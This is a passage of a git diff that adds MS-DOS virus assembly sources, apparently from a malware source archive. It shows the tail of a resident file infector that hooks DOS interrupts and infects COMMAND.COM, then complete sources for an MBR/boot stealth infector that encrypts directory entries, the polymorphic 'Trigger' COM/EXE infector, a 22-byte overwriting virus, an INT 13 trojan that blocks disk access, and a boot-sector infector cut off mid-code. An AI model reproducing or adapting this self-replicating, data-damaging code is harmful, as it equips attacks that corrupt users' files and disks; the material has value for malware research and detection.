linkstate + int 21h + xor ah,ah + push ax + mov ax,5803h ; link umbs + mov bx,1 + int 21h + jc loc_172 + mov ah,48h ; get memory + mov bx,0ffffh + int 21h ; how much is there + mov ah,48h + int 21h + mov es,ax + cmp ax,bp + jae loc_173 ; enough ! + + + dec ax ; else try xms-umbs + mov es,ax + mov es:[di+1],di + + + +loc_172: mov ax,4300h ; xms installed ? + int 2fh + cmp al,80h + jne loc_174 ; no : jmp + + + mov ax,4310h ; get xms-entry + int 2fh + push cs + pop ds + + mov word ptr ds:[si+offset bp_flag-offset cda ],bx + mov word ptr ds:[si+offset bp_flag-offset cda+2],es + + mov ah,10h ; get umb + mov dx,0ffffh ; how much available ? + call dword ptr ds:[si+offset bp_flag-offset cda] + + cmp bl,0b0h ; check errorcode. + jne loc_174 ; "out of mem" : jmp + ; -> request all memory + mov ah,10h + call dword ptr ds:[si+offset bp_flag-offset cda] + dec ax ; "ok" -> ax=1 + jnz loc_174 ; nz -> ax has not been "1" + mov es,bx ; else : segment in bx + +loc_173: mov cl,0c3h + + mov ax,es + dec ax + mov ds,ax + + mov byte ptr [di],5ah ; + mov ds:[di+1],di + sub word ptr ds:[di+3],paras_needed + + call getnextmcb + + mov word ptr cs:[si+offset trem_mcb-offset cda],ax + inc ax + mov es,ax ; es = future virusseg + +loc_174: pop bx + mov ax,5803h + int 21h + pop bx + mov ax,5801h + int 21h + pop ds + + mov cs:[si+offset gettremmem-offset cda],cl + + cmp cl,90h + jne loc_175 + + push ds + pop es + mov bx,0ffffh + mov ah,4ah + int 21h + mov ax,paras_needed + sub ds:[di+3],ax + ; + sub bx,ax + mov ah,4ah + int 21h + + mov ax,ds + inc ax + add ax,bx + mov es,ax ; es=virussegment + +loc_175: push si ; si = offset 0cda + + push cs + pop ds + + sub si,offset cda - offset extra + mov cx,offset buffer - offset extra + mov di,offset extra + rep movsb ; copy virus-code + ; to dest-memory + + add di,32 ; skip buffer + sub si,offset buffer-offset writevirus + mov cx,offset buffer-offset writevirus + rep movsb + + pop si ; pop offset cda + push es + ;----------------------------( get int 21h)----- + mov ax,3521h ; get int 21 + int 21h + pop ds ; ds=virus-seg + cwd ; dx=0 + mov di,offset random_1 + mov [di],dx + mov word ptr ds:[org_487],di; + + mov di,82h ; + mov ds:[di+ 6],es ; -> int 21h + mov ds:[di+ 4],bx + mov ds:[di+16h],es + mov ds:[di+14h],bx + ;----------------------------( get int 15h )----- + mov al,15h + int 21h + mov ds:[di+18h],bx + mov ds:[di+1ah],es + + call setflag_cs_00 + xor cx,cx + call get_1stmcb + + mov word ptr cs:[si+offset dos_seg-offset cda],es +loc_176: or cx,cx + jnz loc_177 + + mov ax,ds ; ds=mcb-seg + inc ax + cmp ax,ds:[di+1] ; mcb-owner = itself ? + jne loc_177 ; no....... + + mov cx,ax ; else -> segment in cx + push ds + +loc_177: cmp byte ptr cs:[si+offset psycholabel-offset cda],90h + je loc_178 ; if "nop" then low-mem + + cmp byte ptr [di],5ah ; last mcb reached ? + jne loc_179 ; if "yes"-> abort scan + +trem_mcb equ $+1 + mov ax,0eef4h + jmp loc_181 + +loc_178: cmp word ptr ds:[di+offset psycholabel+16+2],0c402h + jne loc_179 + + cmp word ptr ds:[di+offset psycholabel+16+4],0f24h + je loc_180 + +loc_179: push ds + pop es + call getnextmcb + jmp loc_176 + +loc_180: mov byte ptr es:[di],5ah ; vir-mcb found + mov ds:[di+1],cx ; set owner = itself + +loc_181: pop cx ; get low_dos_mcb + inc cx + + inc ax + mov ds,cx + + mov word ptr cs:[si+offset low_dos_mcb -offset cda],cx + mov word ptr cs:[si+offset low_dos_mcb_2-offset cda],cx + mov word ptr cs:[si+offset low_dos_mcb_3-offset cda],cx + + call sub_56 + + mov di,4eh + call sub_57 + mov word ptr ds:[di+6],offset newint15 + push ax ; save vir-seg + + push cs + pop ds + + mov word ptr ds:[si+offset org_cf0-offset cda],0 + push ax ; save virus-seg + + mov ax,3501h ; get int 01 + int 21h + + mov di,bx + mov bp,es + + mov ah,25h ; set tracer-int + lea dx,[si+offset newint01-offset cda] + int 21h + + pop es ; get virus-seg + + pushf + pop ax + or ah,1 + push ax + popf + mov ah,30h + pushf + call dword ptr es:[internal_21] + ; + mov ax,2501h ; reset tracer-int + mov dx,di + mov ds,bp + int 21h + + push cs + pop ds ; ds=cs + + push si ; save offset cda + add si,offset trace_result-offset cda + + mov di,offset internal_21 + movsw ; copy dos-entry to + movsw ; es=virus-segment + ; ds=cs + pop si ; get vir-entry + + mov ax,word ptr ds:[si+offset org_cf0-offset cda] + + or ax,ax + jnz loc_183 +loc_182: +low_dos_mcb equ $+1 + + mov ax,0 + mov ds,ax + mov dx,5 ; set int21 to inttable-> + mov ax,2521h ; crash the machine + int 21h + jmp loc_188 +;--------------------------------------------------------------------- +loc_183: xor bx,bx + dec ax ; ax = mcb-seg to check + call check_my_mcb + jz loc_184 ; nz= size > 0a000, ax=size + ; zf= size <=0a000, cx=size + sub ax,10h ; + call check_my_mcb ; + jnz loc_182 ; +;--------------------------------------------------------------------- +loc_184: cli ; cx = size of mcb + mov bp,ds ; +locloop_185: inc bp + mov ds,bp ; ds = psp-seg + + xor bx,bx +loc_186: mov ax,cs:[si+offset trace_result -offset cda] + cmp ax,[bx] ; psp:000, dort steht aber 20cd... + jne loc_187 + + mov ax,cs:[si+offset trace_result+2 -offset cda] + cmp ax,ds:[bx+2] + jne loc_187 + + mov word ptr ds:[bx ],5 ; offset 5 +low_dos_mcb_2 equ $+3 + mov word ptr ds:[bx+2],0 ; in low-dos-seg + +loc_187: inc bx + cmp bl,10h + jne loc_186 + loop locloop_185 + sti +loc_188: pop es ; pop virus-segment (umb) + + push cs + pop ds + + mov ah,1ah ; set dta + lea dx,[si+offset buffer-offset cda] + mov bx,dx ; dta in umb ! + int 21h +;--------------------------------------------------------------------- + mov ah,4eh ; findfirst + mov cx,8 ; attribut = volume ! + lea dx,[si+offset anyfile-offset cda] + int 21h ;----------------------- + ; volume found : + ;----------------------- + mov ax,ds:[bx+16h] ; get files time + mov cx,ds:[bx+18h] ; get files date + +volume_time equ $+1 + cmp ax,6f55h ; time + jne loc_189 ; 13:58:42 + +volume_date equ $+2 + cmp cx,1981h ; date=1981h= + je loc_190 ; 12-1-92 + + ; activate screen flickering +loc_189: mov byte ptr es:[offset psycholabel],0ebh + +loc_190: mov word ptr es:[offset volume_time],ax + mov word ptr es:[offset volume_date],cx + + push es ; es=ds=virseg (umb) + pop ds + cmp byte ptr ds:[offset psycholabel],0ebh + je loc_191 + +low_dos_mcb_3 equ $+1 + mov bx,0 + mov ds,bx + mov ax,2515h + mov dx,0053h ; set int 15h + int 21h ; + +loc_191: pop ds ; get environment-segment + xor bx,bx + ; search comspec= +loc_192: cmp word ptr [ bx],4f43h ; 'co' + jne loc_193 + cmp word ptr [bx+6],3d43h ; 'c=" + je loc_194 + +loc_193: inc bx ; + cmp bh,8 + jne loc_192 + jmp vir_install_done + + ;-------------- ( infect command.com )------------------- +loc_194: lea dx,[bx+8] ; comspec found. + mov ax,4300h ; bx points to string in + mov bx,0faceh ; comspec + int 21h + +vir_install_done: + call sub_54 +sub_54: pop si ; relocate again.. + xor ax,ax + lea di,[si+offset extra-offset sub_54] + + mov cx,(offset kill_label1-offset extra) / 2 + push cs + pop es +kill_label1: rep stosw + add di,offset check_my_mcb-offset kill_label1 + mov cx,(offset buffer-offset check_my_mcb) + rep stosb + +start_psp equ $+1 + mov bx,3c4h + mov ds,bx + push ds + pop es + mov dx,80h + mov ah,1ah ; set dta to psp:80h (default) + int 21h + +com_flag equ $+1 + mov al,1 + or al,al + jz loc_196 + + mov word ptr ds:[101h],103h ; set jmp in com-file +init_jump equ $-2 + push cs + jmp loc_197 + +loc_196: cli + mov ax,cs +init_ss equ $+1 + sub ax,0 + mov ss,ax +init_sp equ $+1 + mov sp,0 + sti + mov ax,cs +init_cs equ $+1 + sub ax,0 + push ax + +init_ip equ $+1 +loc_197: mov ax,100h + push ax + sti + xor ax,ax + mov bx,ax + mov cx,ax + cwd + mov si,ax + mov di,ax + mov bp,ax + retf +;-------------------------------------------------------------------------- +; in : bx=0, ds=cs +;-------------------------------------------------------------------------- +check_my_mcb: mov ds,ax ; + cmp byte ptr [bx],44h ; data-mcb. + je loc_198 + cmp byte ptr [bx],4dh ; mem-mcb + jne loc_ret_199 + +loc_198: mov ax,ds:[bx+3] ; size of mcb + cmp ah,0a0h ; hi-size > a0 + ja loc_ret_199 + + xchg ax,cx + xor bp,bp ;-> zf, else nz +loc_ret_199: retn +;-------------------------------------------------------------------------- +sub_56: mov word ptr ds:[di+6],offset virint21 +sub_57: mov byte ptr ds:[di+5],0eah + mov ds:[di+8],ax ; jmp tremor:int21 + retn ; +;-------------------------------------------------------------------------- +data_x01 dw 0 +data_x02 dw 0 +;-------------------------------------------------------------------------- +writevirus: call code_decode + mov cx,4000 + mov dx,offset extra + mov ah,40h + pushf + call dword ptr ds:[internal_21] + pushf + push ax + push cx +org_1081 equ $+1 + mov al,0 + mov byte ptr ds:[data_103-buf_len],al ; -> add [di],al + call code_decode + pop cx + pop ax + popf + retn +;-------------------------------------------------------------------------- +code_decode: mov ax,0 + mov di,offset buffer + mov cx,0 +locloop_200: +xdata_103 db 31h ; xor [di],ax +xdata_0108 db 5 ; 31 5 = xor [di],ax + db 5 ; 31 35 = xor [di],si +xdata_0109 dw 0 ; = add ax,xxxx + inc di + inc di + loop locloop_200 + retn + +tempint24: xor al,al + iret +;---------------------------------------------( end of virus )------ +buf_len equ offset buffer-offset writevirus +zdata_103 equ offset xdata_103 -offset writevirus +zdata_0108 equ offset xdata_0108-offset writevirus +zdata_0109 equ offset xdata_0109-offset writevirus +ztempint24 equ offset tempint24 -offset writevirus +buffer: db 32 dup (?) +sub_58 equ $ +data_103 equ $+zdata_103 +data_0108 equ $+zdata_0108 +data_0109 equ $+zdata_0109 +posint24 equ $+ztempint24 +;-------------------------------------------------------------------------- +code_seg ends + end start +;-------------------------------------------------------------------------- + diff --git a/MSDOS/Virus.MSDOS.Unknown.trick446.asm b/MSDOS/Virus.MSDOS.Unknown.trick446.asm new file mode 100644 index 00000000..6e18c7de --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.trick446.asm @@ -0,0 +1,255 @@ +; Trick Virii (446 bytes length!) +; (l) 1997 copyleft by Psychomancer // SPS. +; 2:454/7.64@FidoNet + +; MBR/BOOT/EXE stealth hard-removable infector. +; Thanx 2 Nutcracker 4 "cryp_sec" algorithm. + +; WARNING! 4 compile tasm /m option needed! +; DON'T RUN IT! ONLY 4 DEMONSTRATION! + +model tiny +.code + +begin: mov cx,decryp_len + call $+3 + xor ah,ah + int 15h ; antiheuristic trick (must b CF=1 on return) + pop si + sbb al,al ; <- set AL in zero manual on 1st execute! + ; (in DEBUG) + lea di,[si+decryp_begin-6] +xor_decryp: sub al,0 +xor_mask equ $-begin-1 + xor cs:[di],al ; decrypt selfbody + inc di + loop xor_decryp +decryp_begin equ $-begin +decryp_code: sub si,6 + jz file_start ; goto if run from file + mov bx,7c00h + xor di,di + mov ds,di + mov ss,di + mov sp,bx + dec word ptr ds:[413h] ; decrease TOM + mov ax,[di+3*4] + mov [si+rom_mask],ax ; store crypt mask + int 12h + mov cx,206h + mov [si+offrand],ch ; set in 2 + shl ax,cl + mov es,ax + push ss bx + rep movsb ; move selfbody 2 new segm + push es + mov es,cx + mov cl,go_after_move + push cx + retf + +;-----------------------------------------------; + +file_start: mov ax,0deadh + int 13h ; we present in memory? + jnc file_exit + mov ah,13h + int 2fh + mov ax,259ah + int 21h ; set int 9ah on ROM int 13h + mov ah,13h + int 2fh + push cs + pop es + mov ax,1600h + int 2fh + cmp ax,1600h ; we execute under windoze? + mov al,0 + org $-1 + jnc $ ; no - will b crypt direntries + org $-1 + je no_win_run + mov al,0 + org $-1 + jmp $ ; yeah - no crypt direntries + org $-1 +no_win_run: mov cs:cryp_switch,al ; store it + lea bx,buffer + call copy_2_mbr ; infect mbr on 1st hd +file_exit: .exit + +;-----------------------------------------------; + +go_after_move equ $-begin + mov si,13h*4 + mov di,9ah*4 + movsw ; set int 9ah on ROM int 13h + movsw + mov word ptr [si-4],offset int_13h_entry ; hook int 13h + mov [si-2],ax + cmp byte ptr [bx],0ebh ; we loading from floppy boot? + jne load_from_mbr + call copy_2_mbr ; yeah - infect mbr on 1st hd +load_from_mbr: mov cl,11h ; read original mbr code +read_sec: mov dx,80h + mov ax,201h + int 9ah + retf ; exit + +;-----------------------------------------------; + +int_13h_entry: mov cs:store_fn,ah + mov cs:store_sc,al + cmp ax,0deadh ; our function? + je exit_13h_retf + int 9ah ; call old int 13h + pushf + push ax si di ds dx cx es + pop ds + jc exit_13h ; exit if error + mov ax,0 +store_fn = byte ptr $-2 + cmp dl,80h ; non-1st hd? + je hd_access + cmp al,3 ; write? + jne exit_13h + cmp dx,cx ; floppy? + ja no_boot_write + dec cx ; boot? + jnz no_boot_write + mov word ptr [bx],3eebh ; yeah - infect floppy boot + jmp copy_2_boot +no_boot_write: mov ax,[bx] + not ax + mul ah + sub ax,72bah ; 'MZ' or 'ZM' in buffer? + jnz exit_13h + int 1ah ; get timer tick + mov cl,0 ; randomize +offrand equ $-begin-1 + xchg dx,ax + cwd + idiv cx ; get random + and dx,dx + jnz exit_13h + mov [bx+6],dx ; set number of relocation on zero + mov word ptr [bx+8],4 ; length of header + mov [bx+14h],dx ; set cs:ip on zero (i.e. on trick ;) + mov [bx+16h],dx + rol byte ptr cs:offrand,1 ; change randomize +copy_2_boot: lea di,[bx+40h] + call crypt_self ; self encrypt and move 2 buffer + pop cx dx + call write_sec ; write sector on disk + jmp exit_13h_pop +hd_access: cmp al,2 ; read? + jne no_stealth + and dh,dh ; head is zero? + jnz hd_read + dec cx ; cyl/sec is 0/1? + jnz hd_read + mov cl,11h + push cs + call read_sec ; read original mbr +exit_13h: pop cx dx +exit_13h_pop: pop ds di si ax + popf +exit_13h_retf: retf 2 ; exit from int 13h +no_stealth: cmp al,3 ; write? + jne exit_13h +hd_read: mov cs:cryp_or_decryp,0 ; set "js" + org $-1 + js $ + org $-1 + call crypt_sec ; encrypt direntries in buffer +cryp_switch label byte + jnc decrypt_sec ; goto if direntries is not found + pop cx ; restore cyl/sec + push cx + mov ah,3 + int 9ah ; re-write crypted direntries +decrypt_sec: lea ax,exit_13h ; decrypt direntries in buffer + push ax + +;-----------------------------------------------; + +crypt_sec: mov cx,0 ; number of sector +store_sc = byte ptr $-2 + push cx + mov si,bx +scan_next_sec: push cx + mov cl,10h ; number of direntries on one sector +scan_next_elem: push cx si + mov cl,0bh +next_char_name: lodsb + cmp al,' ' ; check if filename + jb get_next_elem + loop next_char_name + lodsb + test al,11001000b ; check if attribute + jnz get_next_elem + mov cl,9 +next_char_res: lodsb + and al,al ; check if normal (not long!) filename + jnz get_next_elem + loop next_char_res + test [si],dl ; already en/decrypted? +cryp_or_decryp label byte + js get_next_elem + xor [si],dl ; en/decrypt direntry + mov ax,0 ; mask of crypt +rom_mask equ $-begin-2 + sub ax,[si+1] + xor [si+5],ax + mov ah,1 ; set bit +get_next_elem: pop si cx + add si,20h ; get next direntry + loop scan_next_elem + pop cx ; get next sector + loop scan_next_sec + inc cs:cryp_or_decryp ; change condition + sahf ; store bit on cf + pop ax + retn + +;-----------------------------------------------; + +crypt_self: push cs + pop ds + xor si,si + in al,40h ; get random mask + mov [si+xor_mask],al + mov cl,decryp_begin + rep movsb ; move unencrypted part + mov ah,-1 + mov cx,decryp_len +xor_encryp: sub ah,al + movsb + xor es:[di-1],ah + loop xor_encryp ; move and encrypt selfbody + retn + +;-----------------------------------------------; + +copy_2_mbr: mov cx,1 + push cs + call read_sec ; read mbr on 1st hd + cmp byte ptr es:[bx],0 ; already infected? + org $-1 + mov cx,0 + org $-2 + je already_prs + mov cl,11h + call write_sec ; store original mbr in 0/0/17 + mov di,bx + call crypt_self ; move and encrypt selfbody + inc cx ; cx=1 +write_sec: mov ax,301h + int 9ah ; infect mbr +already_prs: retn + +decryp_len equ $-decryp_code +len_body equ $-begin +buffer label byte + + end begin diff --git a/MSDOS/Virus.MSDOS.Unknown.trigger.asm b/MSDOS/Virus.MSDOS.Unknown.trigger.asm new file mode 100644 index 00000000..0c0fd30b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.trigger.asm @@ -0,0 +1,500 @@ + .model tiny + .code + .radix 16 + org 0 + + viruslength = (heap - entry) + virussizeK = (endvirus - entry + 3ff) / 400 + virussizepara = (virussizeK)*40 + + EXE_ID = 'PS' + +entry: + call past +next: + db 0,"Trigger by Dark Angel of Phalcon/Skism",0Dh,0A + db "Utilising Dark Angel's Multiple Encryptor (DAME)",0Dh,0A + db 0Dh,0A,0 + +checkstub db 72,0FA,0E,1F,0BA,00,0B8,0B8,40,00,8E,0C0,26,81,3E,63 + +past: cld + pop bp + + mov ax,0cf0 + mov bx,'DA' + int 21 + cmp bx,'GH' + jnz no_trigger +trigger: + push ds + push es + + push cs + pop ds + xor ax,ax +checkagain: + lea si,[bp+checkstub-next] + mov es,ax + xor di,di + mov cx,8 + rep cmpsw + jz trigger_it + inc ax + cmp ax,0a000 + jb checkagain + jmp exit_trigger +trigger_it: + mov [bp+patch-next],ax + mov ds,ax + mov byte ptr ds:73,0cbh + push bp + mov bp,-80 + jmp short $+2 + db 09a ; call far ptr + dw 1 +patch dw ? + pop bp + mov byte ptr ds:73,1f +exit_trigger: + pop es + pop ds + jmp short restore + +no_trigger: + mov ax,4b90 + int 21 + cmp ax,bx + jz restore + + push ds + push es + + mov ax,ds + dec ax + mov ds,ax + sub word ptr ds:3,virussizepara + sub word ptr ds:12,virussizepara + mov es,ds:12 + + push cs + pop ds + + xor di,di + lea si,[bp+offset entry-offset next] + mov cx,(viruslength + 1)/2 + rep movsw + + xor ax,ax + mov ds,ax + sub word ptr ds:413,virussizeK + + mov di,offset oldint21 + mov si,21*4 + movsw + movsw + + cli + + pushf + pushf + pop ax + or ah,1 + push ax + + mov ds:1*4+2,es + mov word ptr ds:1*4,offset int1_1 + + popf + + mov ah,30 + pushf + call dword ptr ds:21*4 + + popf + + lds si,dword ptr es:oldint21 + mov di,si + lodsw + mov word ptr es:int21patch1,ax + lodsw + mov word ptr es:int21patch2,ax + lodsb + mov byte ptr es:int21patch3,al + + push ds ; es:di->int 21 handler + push es + pop ds ; ds->high segment + pop es + + mov al,0ea + stosb + mov ax,offset int21 + stosw + mov ax,ds + stosw + sti + + pop es + pop ds + +restore: + cmp sp,-2 + jnz restoreEXE +restoreCOM: + lea si,[bp+readbuffer-next] + mov di,100 + push di + movsw + movsw + ret +restoreEXE: + mov ax,ds + add ax,10 + add cs:[bp+readbuffer+16-next], ax + add ax,cs:[bp+readbuffer+0e-next] + mov ss,ax + mov sp,cs:[bp+readbuffer+10-next] + jmp dword ptr cs:[bp+readbuffer+14-next] + +readbuffer dw 20cdh + dw 0bh dup (?) + +int1_1: + push bp + mov bp,sp + push ax + + mov ax, [bp+4] ; get segment + cmp ax, cs:oldint21+2 + jae exitint1 + mov cs:oldint21+2,ax + mov ax, [bp+2] + mov cs:oldint21,ax +exitint1: + pop ax + pop bp + iret + +int1_2: + push bp + mov bp,sp + push ax + + mov ax,cs + cmp ax,[bp+4] + jz exitint1 + + mov ax,[bp+4] + cmp ax,cs:oldint21+2 + jnz int1_2_restore + + mov ax,[bp+2] + cmp ax,cs:oldint21 + jb int1_2_restore + sub ax,5 + cmp ax,cs:oldint21 + jbe exitint1 +int1_2_restore: + push es + push di + cld + les di,dword ptr cs:oldint21 + mov al,0ea + stosb + mov ax,offset int21 + stosw + mov ax,cs + stosw + pop di + pop es + + and [bp+6],0feff + jmp exitint1 + +install: + mov bx,ax + iret +int21: + cmp ax,4b90 + jz install + + push ds + push di + lds di,dword ptr cs:oldint21 + mov word ptr ds:[di],1234 +int21patch1 = $ - 2 + mov word ptr ds:[di+2],1234 +int21patch2 = $ - 2 + mov byte ptr ds:[di+4],12 +int21patch3 = $ - 1 + pop di + pop ds + + cld + + cmp ax,4b00 + jz infect + +exitint21: + push ds + push ax + + xor ax,ax + mov ds,ax + cli + mov word ptr ds:1*4,offset int1_2 + mov ds:1*4+2,cs + sti + + pushf + pop ax + or ah,1 + push ax + popf + pop ax + pop ds + db 0ea +oldint21 dw 0, 0 + +callint21: + pushf + call dword ptr cs:oldint21 + ret + +already_infected: + pop dx + pop cx + mov ax,5701 + call callint21 + + mov ah,3e + call callint21 +exitnoclose: + mov ax,4301 + pop dx + pop ds + pop cx + call callint21 + +exitinfect: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + jmp exitint21 + +infect: + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + + mov ax,4300 + call callint21 + push cx + push ds + push dx + + mov ax,4301 + xor cx,cx + call callint21 + + mov ax,3d02 + call callint21 + jc exitnoclose + xchg ax,bx + + mov ax,5700 + int 21 + push cx + push dx + + mov ah,3f + mov cx,18 + push cs + pop ds + push cs + pop es + mov dx,offset readbuffer + mov si,dx + call callint21 + jc already_infected + + mov di,offset writebuffer + mov cx,18/2 + + push si + push di + + rep movsw + + pop di + pop si + + mov ax,4202 + xor cx,cx + cwd + int 21 + + cmp word ptr [di],'ZM' + jnz infectCOM + +infectEXE: + cmp readbuffer+10,EXE_ID +go_already_infected: + jz already_infected + + mov ds:writebuffer+4,ax + mov ds:writebuffer+2,dx + + mov cx,10 + div cx + + sub ax,ds:writebuffer+8 + + mov ds:writebuffer+14,dx + mov ds:writebuffer+16,ax + + xchg cx,dx + + mov ds:writebuffer+0e,ax + mov ds:writebuffer+10,EXE_ID + + mov al,10b + jmp finishinfect + +infectCOM: ; si = readbuffer, di = writebuffer + push ax + + mov cx,4 + xor dx,dx +check_infection_loop: + lodsb + add dl,al + loop check_infection_loop + + pop ax + + or dl,dl + jz go_already_infected + + mov dx,18 + cmp ax,dx + jnb no_fixup_com + + mov ax,4200 + xor cx,cx + int 21 +no_fixup_com: + mov cx,ax + inc ch ; add cx,100 + sub ax,3 + push ax + mov al,0e9 + stosb + pop ax + stosw + add al,ah + add al,0e9 + neg al + stosb + + mov al,11b +finishinfect: + cbw +; ax = bitmask +; bx = start decrypt in carrier file +; cx = encrypt length +; dx = start encrypt in virus +; si = buffer to put decryption routine +; di = buffer to put encryption routine + push bx + + xchg cx,bx + + xor si,si + mov di,offset copyvirus + mov cx,(heap-entry+1)/2 + rep movsw + + push ax + call rnd_init_seed + pop ax + + mov dx,offset copyvirus + mov cx,viruslength + mov si,offset _decryptbuffer + mov di,offset _encryptbuffer + call dame + + push cx + + cmp ds:writebuffer,'ZM' + jnz no_fix_header + + mov dx,ds:writebuffer+2 + mov ax,ds:writebuffer+4 + add cx,viruslength + add ax,cx + adc dx,0 + mov cx,200 + div cx + or dx,dx + jz nohiccup + inc ax +nohiccup: + mov ds:writebuffer+4,ax + mov ds:writebuffer+2,dx +no_fix_header: + call di + pop cx + + pop bx + + mov ah,40 + mov dx,offset _decryptbuffer + call callint21 + + mov ah,40 + mov cx,viruslength + mov dx,offset copyvirus + call callint21 + + mov ax,4200 + xor cx,cx + cwd + int 21 + + mov ah,40 + mov cx,18 + mov dx,offset writebuffer + call callint21 + jmp already_infected + +vars = 0 +include dame.asm + +heap: +vars = 1 +include dame.asm + +writebuffer dw 0c dup (?) +_encryptbuffer: db 80 dup (?) +_decryptbuffer: db 180 dup (?) +copyvirus db viruslength dup (?) + db 20 dup (?) +endvirus: + +end entry + diff --git a/MSDOS/Virus.MSDOS.Unknown.triv22.asm b/MSDOS/Virus.MSDOS.Unknown.triv22.asm new file mode 100644 index 00000000..e2b62f29 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.triv22.asm @@ -0,0 +1,17 @@ +;22 Byte Trivial Virus +;Use WASM to assemble + + org 100h + + db '*.*',0 + + mov ah,4eh +Again + mov dx,si + int 21h + mov ah,3ch + mov dx,9eh + int 21h + xchg bx,ax + mov ah,40h + jmps Again diff --git a/MSDOS/Virus.MSDOS.Unknown.trojan.asm b/MSDOS/Virus.MSDOS.Unknown.trojan.asm new file mode 100644 index 00000000..3e2b9c00 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.trojan.asm @@ -0,0 +1,69 @@ +;***************************************************************************** +; The High Evolutionary's INT 13 Trojan +;***************************************************************************** +; +; Development Notes: +; (Dec.1O.9O) +; +; Well, I was screwing around with TSR's the other day and I got the idea, +; "Hmm. I wonder what would happen if you negated INT 13..." This trojan/TSR +; program answers my query. +; +; It's really a big mess. You can't access any file on the directory, you can't +; DIR anything, can't TYPE anything, I think the only thing you can do is +; DEL which is handled by INT 21. +; +; Well, in any event, put this routine in any nifty source code you see and +; then compile it... It will confuse the fuck out of any 100% "Lame" user. +; +; Have fun... +; +; -= The High Evolutionary =- +; +;***************************************************************************** +; Copyright (C) 199O by The RABID Nat'nl Development Corp. +;***************************************************************************** + + code segment + assume cs:code,ds:code + org 100h + +start: jmp init_vectors + + mesg db 'INT 13 Trojan by The High Evolutionary' + crud db '(C) 199O by RABID Nat''nl Development Corp.' + crap dd ? + +program proc far + + assume cs:code,ds:nothing + + mov ax,4c00h ; Terminate Program with exit code 00 + int 21h ; Call DOS + +program endp + +; +; The TSR initialization shit happens here... +; + +init_vectors proc near + + assume cs:code,ds:code + + mov ah,35h ; ask for int vector + mov al,13h ; intercept INT 13 + int 21h ; Call DOS + mov word ptr crap,bx + mov word ptr crap[2],es + mov ah,25h ; set int value + mov al,13h ; set for INT 13 + mov dx,offset program ; Tell the TSR what to do when accessed + int 21h ; Call DOS + mov dx,offset init_vectors ; Load in this segment into DX + int 27h ; Make the sucker in DX TSR... + +init_vectors endp + + code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.tsd1.asm b/MSDOS/Virus.MSDOS.Unknown.tsd1.asm new file mode 100644 index 00000000..10cef8b1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tsd1.asm @@ -0,0 +1,260 @@ +; Senast ndrad 891213. +; +; Lgger gamla bootsectorn p sida 1, spr 0, sector 3. +; sida 0, spr 0, sector 7 p HD. + + +Code Segment + Assume cs:Code + Org 0000h + +Main Proc Far + db 0EAh,05h,00h,0C0h,07h + + jmp Near Ptr Init ; Hoppa frbi variabler och nya int13h + + +; Variabler + +Old13h dd 0 ; Gamla vectorn till diskfunktionerna. + +TmpVec dd 0 ; Temporr vec. vid ndring av int 13. + +BootPek dw 0003h,0100h + +; Slut p variabler + + + +Int13h Proc Near + push ds + push ax + push bx + + cmp dl,00h ; Drive A + jne Exit + + cmp ah,02h + jb Exit + cmp ah,04h + ja Exit ; Kolla s att func. 2-4 + + sub ax,ax + mov ds,ax + mov bx,043Fh ; Motor status byte. + test Byte Ptr [bx],01h ; Testa om motorn i A: r p.. + jnz Exit ; Nej,hoppa till gamla int 13h + + call Smitta + +Exit: pop bx + pop ax + pop ds + jmp [Old13h] + + +Smitta Proc Near + push cx + push dx + push si + push di + push es + + push cs + pop es + push cs + pop ds + + mov si,0004h ; Max antal frsk. + +Retry: mov ax,0201h ; Ls en sector + mov bx,0200h ; Ls hit. + mov cx,0001h ; Spr 0 Sector 1 + sub dx,dx ; Sida 0 Drive 0 + pushf + call [Old13h] ; Ls in booten. + + jnc OK + + dec si + jz Slut ; Hoppa ur om fel. + jmp Retry ; Frsk max 4 gnger. + + +OK: mov si,0200h + sub di,di + cld + lodsw + cmp ax,[di] + jne L2 + lodsw + cmp ax,[di+2] + jne L2 + jmp Slut + +L2: mov ax,0301h ; Skriv en sector. + mov bx,0200h + mov cx,0003h ; Spr 0 Sector 3 + mov dx,0100h ; Sida 1 Drive 0 + pushf + call [Old13h] ; Flytta boot sectorn. + + mov ax,0301h + sub bx,bx + mov cx,0001h + sub dx,dx + pushf + call [Old13h] ; Skriv ner viruset till booten. + +Slut: pop es + pop di + pop si + pop dx + pop cx + ret +Smitta Endp +Int13h Endp + +Init: sub ax,ax + mov ds,ax ; Nollar ds fr att ndra vect. + + cli + mov ss,ax + mov sp,7C00h + sti ; Stter upp en ny stack. + + push cs + pop es + mov di,Offset Old13h + mov si,004Ch + mov cx,0004h + cld + rep movsb ; Flytta int 13h vectorn. + + mov bx,0413h + mov ax,[bx] ; Minnesstorleken till ax. + dec ax + dec ax + mov [bx],ax ; Reservera plats fr viruset. + + mov cl,06h + shl ax,cl + mov es,ax ; Omvandla till segment addres. + + mov Word Ptr TmpVec,Offset Int13h + mov Word Ptr TmpVec+2,es + push es + sub ax,ax + mov es,ax + push cs + pop ds + mov si,Offset TmpVec + mov di,004Ch + mov cx,0004h + rep movsb + pop es + + sub si,si + mov di,si + mov cx,0200h ; Hela viruset + lite till. + rep movsb + + mov ax,Offset Here + push es + push ax + ret ; Hoppa till viruset. + +Here: sub ax,ax + int 13h ; terstll driven + + sub ax,ax + mov es,ax + mov ax,0201h ; Ls en sector funk. + mov bx,7C00h ; Hit laddas booten normalt. + mov cx,BootPek + mov dx,BootPek+2 + int 13h + + push cs + pop es + mov ax,0201h + mov bx,0200h + mov cx,0001h + mov dx,0080h + int 13h ; Ls in partions tabellen. + jc Over + push cs + pop ds + mov si,0200h + sub di,di + lodsw + cmp ax,[di] ; Kolla om den r smittad. + jne HdInf + lodsw + cmp ax,[di+2] + jne HdInf + +Over: mov BootPek,0003h + mov BootPek+2,0100h + sub bx,bx + push bx + mov bx,7C00h + push bx + ret ; Kr den gamla booten. + +HdInf: mov BootPek,0007h + mov BootPek+2,0080h + + mov ax,0301h + mov bx,0200h + mov cx,0007h + mov dx,0080h + int 13h ; Flytta orgin. part.tabellen. + jc Over + + push cs + pop ds + push cs + pop es + mov si,03BEh + mov di,01BEh + mov 